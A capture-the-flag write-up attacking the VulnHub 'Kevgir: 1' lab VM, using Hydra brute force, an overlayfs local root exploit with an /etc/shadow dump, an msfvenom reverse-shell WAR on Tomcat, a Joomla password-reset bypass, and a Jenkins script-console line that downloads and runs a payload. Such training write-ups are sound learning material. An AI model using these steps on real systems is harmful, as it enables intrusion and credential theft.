[VulnHub] Kevgir: 1

“For Educational Purposes

Kevgir has designed by canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announced that.

Have fun!“ – canyoupwn.me

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: Kevgir: 1 (10.1.1.128/24)

Vulnerability & Exploit

A bunch of vunlerabilities exists in this machine and waiting us to dig them out, attacking vectors including:

  • Bruteforce Attacks
  • Web Application Vulnerabilities
  • Hacking with Redis
  • Hacking with Tomcat, Jenkins
  • Hacking with Misconfigurations
  • Hacking with CMS Exploits
  • Local Privilege Escalation
  • And other vulnerabilities

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover running services and open ports [masscan && nmap]
  • Web application scanned to dig more information about web service [nikto]
  • Online bruteforce attack to reveal weak passwords [hydra]
  • Exploit multiple vulnerabilities to get a shell
  • Enumeration and exploit the local priviledge vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

1
2
3
4
5
6
7
8
9
10
11
root@kali:/usr/share/exploitdb# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.128    00:0c:29:c1:44:ae   VMware, Inc.
10.1.1.254    00:50:56:e2:6b:e8   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.984 seconds (85.79 hosts/sec). 4 responded
root@kali:/usr/share/exploitdb#

10.1.1.128 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# masscan -p1-65535 10.1.1.128/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-05-23 10:10:36 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 8081/tcp on 10.1.1.128
Discovered open port 111/tcp on 10.1.1.128
Discovered open port 25/tcp on 10.1.1.128
Discovered open port 8080/tcp on 10.1.1.128
Discovered open port 445/tcp on 10.1.1.128
Discovered open port 6379/tcp on 10.1.1.128
Discovered open port 80/tcp on 10.1.1.128
Discovered open port 44966/tcp on 10.1.1.128
Discovered open port 9000/tcp on 10.1.1.128
Discovered open port 37543/tcp on 10.1.1.128
Discovered open port 59876/tcp on 10.1.1.128
Discovered open port 139/tcp on 10.1.1.128
Discovered open port 35812/tcp on 10.1.1.128
Discovered open port 1322/tcp on 10.1.1.128
Discovered open port 41295/tcp on 10.1.1.128
Discovered open port 2049/tcp on 10.1.1.128
Discovered open port 34551/tcp on 10.1.1.128
Discovered open port 59788/tcp on 10.1.1.128
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
# Nmap 6.49BETA5 scan initiated Mon May 23 06:20:21 2016 as: nmap -sV -A -O -v -p 25-9000,34551-44966,59788,59876 -oN 128_nmap.txt 10.1.1.128
Nmap scan report for 10.1.1.128
Host is up (0.00034s latency).
Not shown: 19376 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  ftp         vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56442/udp  mountd
|   100005  1,2,3      59876/tcp  mountd
|   100021  1,3,4      52779/udp  nlockmgr
|   100021  1,3,4      59788/tcp  nlockmgr
|   100024  1          35287/udp  status
|   100024  1          44966/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
|   2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|_  256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
2049/tcp  open  nfs         2-4 (RPC #100003)
6379/tcp  open  redis       Redis key-value store
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 14 disallowed entries
| /administrator/ /cache/ /components/ /images/
| /includes/ /installation/ /language/ /libraries/ /media/
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp  open  http        Jetty winstone-2.9
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
34551/tcp open  ssh         Apache Mina sshd 0.8.0 (protocol 2.0)
35812/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56442/udp  mountd
|   100005  1,2,3      59876/tcp  mountd
|   100021  1,3,4      52779/udp  nlockmgr
|   100021  1,3,4      59788/tcp  nlockmgr
|   100024  1          35287/udp  status
|   100024  1          44966/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
37543/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56442/udp  mountd
|   100005  1,2,3      59876/tcp  mountd
|   100021  1,3,4      52779/udp  nlockmgr
|   100021  1,3,4      59788/tcp  nlockmgr
|   100024  1          35287/udp  status
|   100024  1          44966/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
41295/tcp open  unknown
44966/tcp open  status      1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56442/udp  mountd
|   100005  1,2,3      59876/tcp  mountd
|   100021  1,3,4      52779/udp  nlockmgr
|   100021  1,3,4      59788/tcp  nlockmgr
|   100024  1          35287/udp  status
|   100024  1          44966/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
59788/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56442/udp  mountd
|   100005  1,2,3      59876/tcp  mountd
|   100021  1,3,4      52779/udp  nlockmgr
|   100021  1,3,4      59788/tcp  nlockmgr
|   100024  1          35287/udp  status
|   100024  1          44966/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
59876/tcp open  mountd      1-3 (RPC #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port41295-TCP:V=6.49BETA5%I=7%D=5/23%Time=5742D989%P=x86_64-pc-linux-gn
SF:u%r(DNSVersionBindReq,36,"Unrecognized\x20protocol:\x20\0\x06\x01\0\0\x
SF:01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\n")%r(DNSStatusRequest,
SF:24,"Unrecognized\x20protocol:\x20\0\0\x10\0\0\0\0\0\0\0\0\0\n");
MAC Address: 00:0C:29:C1:44:AE (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.015 days (since Mon May 23 06:01:00 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   CANYOUPWNME<00>      Flags: <unique><active>
|   CANYOUPWNME<03>      Flags: <unique><active>
|   CANYOUPWNME<20>      Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: canyoupwnme
|   NetBIOS computer name: CANYOUPWNME
|   Domain name:
|   FQDN: canyoupwnme
|_  System time: 2016-05-23T13:22:22+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 10.1.1.128

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 23 06:22:54 2016 -- 1 IP address (1 host up) scanned in 153.46 seconds

There are some suspectable information:

  • FTP service is running on port 25
  • SSH service is running on port 1322
  • Web service is running on port 80
  • Redis services is running on port 6379
  • Tomcat is running on port 8080
  • Joomla v1.5 is running on port 8081
  • Jenkins is running on port 9000

In the meanwhile, I run nikto to scan web vulnerabilities in terms of port 80, 8080, 9091 and 9000 found by port-scanning stage.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.128
+ Target Hostname:    10.1.1.128
+ Target Port:        80
+ Start Time:         2016-05-23 06:28:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xec 0x52c8b6c4fbb0a
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8479 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2016-05-23 06:29:07 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

phpmyadmin was found but nothing else, so I move on to port 8080.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.128
+ Target Hostname:    10.1.1.128
+ Target Port:        8080
+ Start Time:         2016-05-23 06:30:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1454530701000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7643 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2016-05-23 06:30:50 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Based on the result, default tomcat login/password was found: tomcat/tomcat

Vector 1: FTP login bruteforce attack

Use hydra with SecLists dictionary to brute force week password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/Kevgir# hydra -L ~/tools/SecLists/Usernames/top_shortlist.txt -P ~/tools/SecLists/Passwords/john.txt -u -s 25 10.1.1.128 ftp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-23 06:52:29
[DATA] max 16 tasks per 1 server, overall 64 tasks, 34177 login tries (l:11/p:3107), ~33 tries per task
[DATA] attacking service ftp on port 25
[STATUS] 320.00 tries/min, 320 tries in 00:01h, 33857 todo in 01:46h, 16 active
[STATUS] 320.33 tries/min, 961 tries in 00:03h, 33216 todo in 01:44h, 16 active
[STATUS] 314.14 tries/min, 2199 tries in 00:07h, 31978 todo in 01:42h, 16 active
[STATUS] 311.20 tries/min, 4668 tries in 00:15h, 29509 todo in 01:35h, 16 active
[STATUS] 310.39 tries/min, 9622 tries in 00:31h, 24555 todo in 01:20h, 16 active
[STATUS] 311.81 tries/min, 14655 tries in 00:47h, 19522 todo in 01:03h, 16 active
[25][ftp] host: 10.1.1.128   login: admin   password: admin
[STATUS] 313.14 tries/min, 19728 tries in 01:03h, 14449 todo in 00:47h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@kali:~/Kevgir#

login/password found: admin/admin

Then using the found username/password login via SSH (port 1322), and … succeed!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
root@kali:~/Kevgir# ssh -p 1322 admin@10.1.1.128
The authenticity of host '[10.1.1.128]:1322 ([10.1.1.128]:1322)' can't be established.
ECDSA key fingerprint is 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.1.1.128]:1322' (ECDSA) to the list of known hosts.
                                                                  
                                                                  
  G:                ,;                                            
  E#,    :        f#i                        .Gt  t    j.         
  E#t  .GE      .E#t                        j#W:  Ej   EW,        
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j       
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.     
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;    
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f   
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E: 
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK: 
                                              ;;  ,;.             
                                                                  
                                                   by canyoupwn.me

admin@10.1.1.128's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon May 23 22:56:12 EEST 2016

  System load: 0.32              Memory usage: 4%   Processes:       167
  Usage of /:  32.5% of 6.50GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

151 packages can be updated.
79 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

admin@canyoupwnme:~$ id
uid=1002(admin) gid=1002(admin) groups=1002(admin)

Then, spending time on enumeration and found the target system is Ubuntu 14.04

1
2
admin@canyoupwnme:/home/user$ uname -a
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

Try to local priv escape and searching keyword 14.04 in exploit-db

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:/usr/share/exploitdb# ./searchsploit 14.04
------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                             |  Path
                                                                                                                                           | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apport 2.14.1 (Ubuntu 14.04.2) - Linux Local Root Exploit                                                                                  | ./linux/local/36782.sh
Seagate Central 2014.0410.0026-F Remote Root Exploit                                                                                       | ./hardware/remote/37184.py
Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit                                                                      | ./hardware/webapps/37185.py
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell                                                   | ./linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)                          | ./linux/local/37293.txt
NetKit FTP Client (Ubuntu 14.04) - Crash/DoS PoC                                                                                           | ./linux/dos/37777.txt
Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit                                                                  | ./linux/local/39166.c
Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)                                                     | ./linux/dos/39771.txt
------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

After several attempts and found the exploit overlayfs local root exploit (39166.c) is able to work.

So the next step is to upload the exploit file 39166.c and gcc compile it to executable file, and run it for rooting!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
admin@canyoupwnme:/tmp$ gcc 39166.c -o 39166
admin@canyoupwnme:/tmp$ ./39166
root@canyoupwnme:/tmp# id
uid=0(root) gid=1002(admin) groups=0(root),1002(admin)
root@canyoupwnme:/tmp# pwd
/tmp
root@canyoupwnme:/tmp# cat /etc/shadow
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
mysql:!:16834:0:99999:7:::
messagebus:*:16834:0:99999:7:::
landscape:*:16834:0:99999:7:::
sshd:*:16834:0:99999:7:::
tomcat7:*:16834:0:99999:7:::
user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::
ftp:*:16834:0:99999:7:::
admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::
statd:*:16839:0:99999:7:::
jenkins:*:16840:0:99999:7:::
root@canyoupwnme:/tmp#

Well done!

Vector 2: Tomcat default account login and file upload vulnerability

From the nikto result of port 8080, I found this is a tomcat server which the default username/password is still available: tomcat/tomcat.

Then, accessing to management page http://10.1.1.128:8080/manager/html/ and login with default username/password

After login succeed, use msfvenom to create a reverse_shell WAR exploit.

1
2
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.1.1.130 LPORT=4444 -f war > sh4444.war
Payload size: 1088 bytes

and then upload/deploy exploit WAR file.

Then setup nc to listen on local port 4444, and access exploit URL http://10.1.1.128:8080/sh4444/ to run the exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.128] 43783
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
pwd
/var/lib/tomcat7
ls -al
total 24
drwxr-xr-x  6 root    root    4096 Feb  3 22:12 .
drwxr-xr-x 50 root    root    4096 Feb 15 06:40 ..
drwxr-xr-x  3 tomcat7 tomcat7 4096 Feb  3 22:12 common
lrwxrwxrwx  1 root    root      12 Jun 20  2015 conf -> /etc/tomcat7
lrwxrwxrwx  1 root    root      17 Jun 20  2015 logs -> ../../log/tomcat7
drwxr-xr-x  3 tomcat7 tomcat7 4096 Feb  3 22:12 server
drwxr-xr-x  3 tomcat7 tomcat7 4096 Feb  3 22:12 shared
drwxrwxr-x  6 tomcat7 tomcat7 4096 May 24 12:40 webapps
lrwxrwxrwx  1 root    root      19 Jun 20  2015 work -> ../../cache/tomcat7

Now we are in~

or you can use metasploit (msfconsole) to do this job automatically by using the exploit: exploit/multi/http/tomcat_mgr_upload.

Vector 3: Joomla v1.5 admin password bypass attack

From the nmap scan result, we know Joomla v1.5 is running on target machine’s port 8081.

Run joomscan to check if any known vulnerability exists, found the joomla version is 1.5.1 and there is a Remote Admin Password Change Vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
...truncate...

## Fingerprinting in progress ...

Use of uninitialized value in pattern match (m//) at ./joomscan.pl line 1009.
~Generic version family ....... [1.5.x]

~1.5.x htaccess.txt revealed [1.5.1 - 1.5.3]
~1.5.x configuration.php-dist revealed [1.5.1 - 1.5.8]
~1.5.x en-GB.xml revealed [1.5.0 - 1.5.1]
~1.5.x en-GB.ini revealed 1.5.1
~1.5.x admin en-GB.com_config.ini revealed [1.5.0(stable) -1.5.1]
~1.5.x admin en-GB.ini revealed 1.5.1
~1.5.x adminlists.html revealed [1.5.0(stable) - 1.5.6]

* The Exact version found is 1.5.1

## Fingerprinting done.

...truncate...

...truncate...

# 15
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
Vulnerable? Yes

...truncate...

Followed the instruction and change the Joomla admin password to test, and then login to the administrator page.

Then choose Extensions –> Template Manager –> beez (any template will do the job) –> Edit HTML

Then clear all the exist content and paste your PHP exploit code here (in this case, I am using Pentest Monkey one.).

Then save and apply.

Finally, setup nc to listen on port 4444 and preview the page to trigger the exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/Kevgir# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.128] 43800
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
 14:02:50 up 1 day,  1:06,  1 user,  load average: 0.16, 0.07, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
admin    pts/0    10.1.1.130       Mon15    1:33m  0.20s  0.06s sshd: admin [priv]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/

Vector 4: Jenkins login bruteforce attack

Due to Jenkins is vulnerable to brute force attacking…

so use MSF to brute force attack the jenkins server with common dictionary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf auxiliary(jenkins_login) > show options

Module options (auxiliary/scanner/http/jenkins_login):

   Name              Current Setting                                   Required  Description
   ----              ---------------                                   --------  -----------
   BLANK_PASSWORDS   false                                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                 yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                             no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                             no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                             no        Add all users in the current database to the list
   HTTP_METHOD       POST                                              yes       The HTTP method to use for the login (Accepted: GET, POST)
   LOGIN_URL         /j_acegi_security_check                           yes       The URL that handles the login process
   PASSWORD                                                            no        A specific password to authenticate with
   PASS_FILE         /root/tools/SecLists/Passwords/john.txt           no        File containing passwords, one per line
   Proxies                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            10.1.1.128                                        yes       The target address range or CIDR identifier
   RPORT             9000                                              yes       The target port
   STOP_ON_SUCCESS   false                                             yes       Stop guessing when a credential works for a host
   THREADS           10                                                yes       The number of concurrent threads
   USERNAME                                                            no        A specific username to authenticate as
   USERPASS_FILE                                                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                             no        Try the username as the password for all users
   USER_FILE         /root/tools/SecLists/Usernames/top_shortlist.txt  no        File containing usernames, one per line
   VERBOSE           true                                              yes       Whether to print output for all attempts
   VHOST                                                               no        HTTP server virtual host

msf auxiliary(jenkins_login) > set verbose false
verbose => false
msf auxiliary(jenkins_login) > exploit

[+] 10.1.1.128:9000 - LOGIN SUCCESSFUL: admin:hello
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(jenkins_login) >

Bingo! user login found: admin/hello.

Now let’s login to jenkins managing page, and following to this tutorial to run commands.

Go to Manage Jenkins and then Script Console, input and run the following script code to check if command can be run on the target server.

Next, run msfconsole and use payload exploit/multi/script/web_delivery to create python backdoor and setup evil web server on local port 8080 in order to upload the backdoor.

After evil web server has been established, we input the following code in the script console.

1
2
def process = "wget http://10.1.1.130:8080/z7UgcWwtF -O /tmp/bdsh4444".execute()
def process3 = "python /tmp/bdsh4444".execute()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.1.1.130       yes       The listen address
